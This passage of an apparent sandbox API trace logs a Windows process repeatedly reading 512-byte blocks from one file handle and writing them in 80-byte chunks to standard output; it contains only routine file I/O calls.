lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.123] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.123] GetFileType (hFile=0x50) returned 0x1 [0211.123] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.123] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.123] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.123] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.123] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.123] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.123] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.123] GetFileType (hFile=0x50) returned 0x1 [0211.123] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.123] GetFileType (hFile=0x50) returned 0x1 [0211.123] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.123] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.123] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.123] GetFileType (hFile=0x50) returned 0x1 [0211.124] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.124] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.124] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0211.124] GetFileType (hFile=0x50) returned 0x1 [0211.124] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.124] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.124] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.124] GetFileType (hFile=0x50) returned 0x1 [0211.124] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.124] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.124] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.124] GetFileType (hFile=0x50) returned 0x1 [0211.124] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.124] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.124] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.124] GetFileType (hFile=0x50) returned 0x1 [0211.124] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.124] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.124] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.124] GetFileType (hFile=0x50) returned 0x1 [0211.124] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.124] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.124] _get_osfhandle (_FileHandle=4) returned 0x58 
[0211.124] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.125] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.125] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.125] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.125] GetFileType (hFile=0x50) returned 0x1 [0211.125] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.125] GetFileType (hFile=0x50) returned 0x1 [0211.125] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.125] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.125] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.125] GetFileType (hFile=0x50) returned 0x1 [0211.125] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.125] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.125] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.125] GetFileType (hFile=0x50) returned 0x1 [0211.125] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.125] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.125] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.125] GetFileType (hFile=0x50) returned 0x1 [0211.125] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.125] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, 
lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.125] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.125] GetFileType (hFile=0x50) returned 0x1 [0211.126] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.126] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.126] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.126] GetFileType (hFile=0x50) returned 0x1 [0211.126] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.126] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.126] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.126] GetFileType (hFile=0x50) returned 0x1 [0211.126] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.126] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.126] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.126] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.126] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.126] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.126] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.126] GetFileType (hFile=0x50) returned 0x1 [0211.126] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.126] GetFileType (hFile=0x50) returned 0x1 [0211.126] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0211.126] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.126] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.126] GetFileType (hFile=0x50) returned 0x1 [0211.127] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.127] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.127] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.127] GetFileType (hFile=0x50) returned 0x1 [0211.127] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.127] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.127] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.127] GetFileType (hFile=0x50) returned 0x1 [0211.127] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.127] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.127] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.127] GetFileType (hFile=0x50) returned 0x1 [0211.127] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.127] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.127] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.127] GetFileType (hFile=0x50) returned 0x1 [0211.127] _get_osfhandle (_FileHandle=1) returned 
0x50 [0211.127] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.128] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.128] GetFileType (hFile=0x50) returned 0x1 [0211.128] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.128] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.128] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.128] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.128] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.128] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.128] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.128] GetFileType (hFile=0x50) returned 0x1 [0211.128] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.128] GetFileType (hFile=0x50) returned 0x1 [0211.128] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.128] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.128] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.128] GetFileType (hFile=0x50) returned 0x1 [0211.128] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.128] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) 
returned 1 [0211.128] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.128] GetFileType (hFile=0x50) returned 0x1 [0211.129] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.129] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.129] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.129] GetFileType (hFile=0x50) returned 0x1 [0211.129] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.129] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.129] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.129] GetFileType (hFile=0x50) returned 0x1 [0211.129] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.129] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.129] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.129] GetFileType (hFile=0x50) returned 0x1 [0211.129] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.129] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.129] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.129] GetFileType (hFile=0x50) returned 0x1 [0211.129] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.129] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.129] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0211.129] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.129] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.129] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.129] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.130] GetFileType (hFile=0x50) returned 0x1 [0211.130] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.130] GetFileType (hFile=0x50) returned 0x1 [0211.130] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.130] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.130] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.130] GetFileType (hFile=0x50) returned 0x1 [0211.130] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.130] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.130] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.130] GetFileType (hFile=0x50) returned 0x1 [0211.130] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.130] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.130] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.130] GetFileType (hFile=0x50) returned 0x1 [0211.130] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.130] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.130] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.130] GetFileType (hFile=0x50) returned 0x1 [0211.130] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.130] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.130] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.130] GetFileType (hFile=0x50) returned 0x1 [0211.130] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.130] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.130] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.131] GetFileType (hFile=0x50) returned 0x1 [0211.131] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.131] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.131] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.131] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.131] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.131] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.131] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.131] GetFileType (hFile=0x50) returned 0x1 [0211.131] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.131] GetFileType 
(hFile=0x50) returned 0x1 [0211.131] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.131] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.131] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.131] GetFileType (hFile=0x50) returned 0x1 [0211.131] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.131] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.131] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.131] GetFileType (hFile=0x50) returned 0x1 [0211.131] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.131] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.131] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.131] GetFileType (hFile=0x50) returned 0x1 [0211.131] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.131] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.131] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.131] GetFileType (hFile=0x50) returned 0x1 [0211.131] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.131] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.131] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.131] GetFileType (hFile=0x50) returned 0x1 [0211.132] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0211.132] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.132] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.132] GetFileType (hFile=0x50) returned 0x1 [0211.132] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.132] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.132] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.132] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.132] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.132] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.132] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.132] GetFileType (hFile=0x50) returned 0x1 [0211.132] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.132] GetFileType (hFile=0x50) returned 0x1 [0211.132] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.132] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.132] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.132] GetFileType (hFile=0x50) returned 0x1 [0211.132] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.132] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, 
lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.132] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.132] GetFileType (hFile=0x50) returned 0x1 [0211.132] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.132] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.132] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.132] GetFileType (hFile=0x50) returned 0x1 [0211.132] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.132] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.132] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.132] GetFileType (hFile=0x50) returned 0x1 [0211.132] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.132] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.133] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.133] GetFileType (hFile=0x50) returned 0x1 [0211.133] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.133] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.133] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.133] GetFileType (hFile=0x50) returned 0x1 [0211.133] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.133] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, 
lpOverlapped=0x0) returned 1 [0211.133] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.133] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.133] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.133] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.133] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.133] GetFileType (hFile=0x50) returned 0x1 [0211.133] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.133] GetFileType (hFile=0x50) returned 0x1 [0211.133] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.133] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, 